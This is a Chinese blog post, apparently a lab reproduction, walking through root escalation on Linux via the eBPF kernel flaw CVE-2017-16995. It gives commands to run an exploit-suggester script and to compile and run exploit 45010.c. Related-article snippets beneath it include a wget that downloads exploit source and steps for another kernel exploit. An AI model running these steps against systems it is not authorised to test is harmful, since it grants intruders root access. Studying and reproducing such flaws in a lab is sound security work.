提权_【CVE-2017-16995】 Linux 内核漏洞提权

最新推荐文章于 2023-02-17 15:53:06 发布
最新推荐文章于 2023-02-17 15:53:06 发布
阅读量2.8k 收藏 1
点赞数 1
分类专栏: 提权测试 文章标签: windows 安全 visual studio
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44798520/article/details/121607166
版权

1.信息收集

上传信息收集脚本,运行并查看是否有【CVE-2017-16995】漏洞

这里我用到的信息收集脚本为:linux-exploit-suggester-2.pl

perl linux-exploit-suggester-2.pl

在这里插入图片描述

2.上传EXP

在这里插入图片描述

3.编译执行

gcc 45010.c -o 45010           	 //编译45010.c
./45010                       	 //运行45010,运行不了就【chmod +x 45010】给他个执行权限

在这里插入图片描述

4.提权成功

id 命令查看提权成功

在这里插入图片描述

草木caomu
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2017-16995脚本
03-20
Ubuntu本地内核提权,用于大家一起学习,更好的维护好系统
linux内核漏洞CVE-2022-0847)
墨鱼菜鸡
09-10 300
目录 1.打开kali,新建用户 2.将用户添加到sudoers文件夹中 3.编译a.c 4.找一个具有SUID权限的可执行文件,进行提权 5.执行poc提权 1.打开kali,新建用户 useradd test1 -p 123456 -d /home/test1 -s /bin/bash 2.将用户添加到sudoers文件夹中 ...
(转载)Linux内核漏洞浅析
Kendiv's Box
11-07 3524
Linux内核漏洞浅析文章属性:转载(http://www.xfocus.net/articles/200410/746.html)与Windows相比,Linux被认为具有更好的安全性和其他扩展性能。这些特性使得Linux在操作系统领域异军突起,得到越来越多的重视。随着Linux应用量的增加,其安全性也逐渐受到了公众甚或黑客的关注。那么,Linux是否真的如其支持厂商们所宣称的那样安全呢?本期我
linux提权漏洞内核版本,关于linux内核本地提权漏洞CVE-2017-16995
weixin_39642990的博客
05-03 274
漏洞概述Jann Horn发现内核中Berkeley Packet Filter(BPF)实现中, Linux内核4.14.8版本开始kernel/bpf/ verifier.c源码中的check_alu_op函数启用了不正确地执行符号扩展,可导致内存任意读写漏洞。一般用户可利用这个漏洞,实现任意代码,获得本地提权操作。日前, CVE-2017-16995Linux内核漏洞攻击代码被发布:影响版...
初识linux内核漏洞利用
12-12 200
0x00 简介 之前只接触过应用层的漏洞利用, 这次第一次接触到内核层次的,小结一下。 0x01 概况 这次接触到的,是吾爱破解挑战赛里的一个题,给了一个有问题的驱动程序,要求在ubuntu 14.04 32位系统环境下提权。驱动实现了write函数,但是write可以写0x5a0000000个字节。然后还实现了一个ioctl,这里有任意地址写的问题(但是这个分析里没用到)...
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
新版脏牛Linux内核提权漏洞CVE-2022-0847
03-09
5.8 <= Linux kernel 中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复。
CVE-2018-17182:Linux内核VMA-UAF提权突破(CVE-2018-17182),0天
03-20
Linux内核VMA-UAF提权突破(CVE-2018-17182) 关于 Google Project Zero的网络安全研究人员发布了详细信息,并针对自内核版本3.16至4.18.8以来Linux内核中存在的高严重性漏洞的概念验证(PoC)漏洞利用。 由白帽...
CVE-2020-14386:Linux内核权限提升漏洞分析 .pdf
09-05
CVE-2020-14386:Linux内核权限提升漏洞分析 APT 安全研究 安全 漏洞分析 应急响应
cve-2019-11477--2019-06-17-1629.sh
06-27
Linux 内核TCP “SACK Panic” 远程拒绝服务漏洞-cve-2019-11477 检测脚本
ubuntu CVE-2017-16995 本地提权复现及修复
weixin_44664530的博客
04-26 361
影响版本 Linux内核Linux Kernel Version 4.14 ~ 4.4 Ubuntu版本:16.04.01~ 16.04.04 查看权限及版本信息 id cat /proc/version 下载poc wget http://cyseclabs.com/pub/upstream44.c 使用gcc进行编译,执行 修复 echo 1 > /proc/sys/kerne...
CVE-2017-16995 ubuntu16.04
weixin_34162401的博客
03-18 138
漏洞存在于Linux内核带有的eBPF bpf(2)系统调用中,当用户提供恶意BPF程序使eBPF验证器模块产生计算错误,导致任意内存读写问题。 非特权用户可以使用此漏洞获得权限提升。 image.png 在VPS上复现,首先需要gcc环境进行编译 其中出现fatal error: stdio...
Linux内核漏洞有哪些
weixin_42596214的博客
02-17 446
Linux内核漏洞主要有两种:内存溢出漏洞和缓冲区溢出漏洞。内存溢出漏洞指的是程序试图向一块已经被分配出去的内存中写入数据,而缓冲区溢出漏洞指的是当程序接收到超过其所能处理的数据,就会导致缓冲区溢出,从而改变程序的运行状态。 ...
CVE-2017-16995 Ubuntu16.04本地提权漏洞复现
weixin_30875157的博客
03-16 391
0x01 前言 该漏洞由Google project zero发现。据悉,该漏洞存在于带有 eBPF bpf(2)系统(CONFIG_BPF_SYSCALL)编译支持的Linux内核中,是一个内存任意读写漏洞。该漏洞是由于eBPF验证模块的计算错误产生的。普通用户可以构造特殊的BPF来触发该漏洞,此外恶意攻击者也可以使用该漏洞来进行本地提权操作。...
Linux 内核中发现漏洞 低权限账户有可能获得 root 权限
llawliet0001的专栏
08-06 297
导读 在Linux内核中发现了一个漏洞,使一些低权限账户有可能在一些流行的发行版上获得 root 权限,包括 Ubuntu、Debian 和 Fedora 都受到了影响。该漏洞被命名为 Sequoia,它存在于文件系统层。 这个安全问题被认为影响了自 2014 年以来发布的所有版本的 Linux 内核,这意味着大量的发行版都有漏洞。具体来说,该漏洞是一个 size_t到 int 的类型转换漏洞,可以被利用来提升权限。 来自 Qualys 的安全研究人员写道:"我们在 Linux 内核的文..
Ubuntu 16.04漏洞复现(CVE-2017-16995)
weixin_44522540的博客
04-23 1931
简介 Linux kernel是美国Linux基金会发布的开源操作系统Linux所使用的内核漏洞概述 该漏洞存在于带有 eBPF bpf(2)系统(CONFIG_BPF_SYSCALL)编译支持的Linux内核中,是一个内存任意读写漏洞。该漏洞是由于eBPF验证模块的计算错误产生的。普通用户可以构造特殊的BPF来触发该漏洞,此外恶意攻击者也可以使用该漏洞来进行本地提权操作。 复现过程 查看当前用户id (1)来到“tmp”目录下,执行文件perl linux-exploit-suggester-2.p
Ubuntu内核提权CVE-2017-16995
weixin_68652890的博客
04-15 714
内核提权 环境: 墨者靶场 工具 msf linux-exploit-suggester-master xshell 利用 xshell连接发现是hack权限 上传linux-exploit-suggester.sh到服务器 Possible Exploits:   CVE-2017-16995   CVE-2016-5195 CVE-2016-5195也可以利用 我们这里利用CVE-2017-16995进行提权 影响 CVE-2017-16995 Linux
linux补丁 CVE漏洞补丁,深入解读补丁分析发现的linux内核提权漏洞(CVE-2017–1000405)...
weixin_42361175的博客
05-16 1062
作者:rain预估稿费:400投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿1. 前言近日(2017.11.30)国外安全团队Bindecy爆出名为大脏牛(Huge Dirty Cow)的内核提权漏洞,编号为CVE-2017–1000405。包含linux内核(2.6.38~4.14)的服务器,桌面,移动等众多设备将面临严重挑战,数以百万计的用户受到安全威胁。该漏洞是由于对...
CVE-2019-11477 漏洞检测脚本(影响大多数Linux内核
大哥一声吼
06-20 5890
漏洞公布时间:2019-06-17 漏洞影响范围:CVE-2019-11477: SACK Panic (Linux >= 2.6.29) 漏洞概述: A sequence of SACKs may be crafted such that one can trigger an integer overflow, leading to a kernel panic. 漏洞详情: 首先...
Linux kernel(CVE-2018-17182)提权漏洞复现
最新发布
06-12
为了避免对网络安全造成不必要的威胁,我无法提供具体的漏洞复现步骤。但是,我可以简单地描述一下CVE-2018-17182漏洞的一般性质和可能的攻击方式。 CVE-2018-17182是Linux内核中的一种提权漏洞,攻击者可以利用该漏洞以root权限在系统中执行任意代码。这个漏洞的原因是一个名为"Race Condition"(竞争条件)的问题,通过在内核中利用这个问题,攻击者可以覆盖内核内存中的关键数据结构,以此来控制系统的行为。 攻击者可以通过构造恶意的程序或者利用已存在的软件漏洞来利用该漏洞。因此,为了保护系统的安全,我们应该尽可能保持系统和软件的更新,并采取一系列的安全措施,例如限制用户的权限、使用安全的密码策略等等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值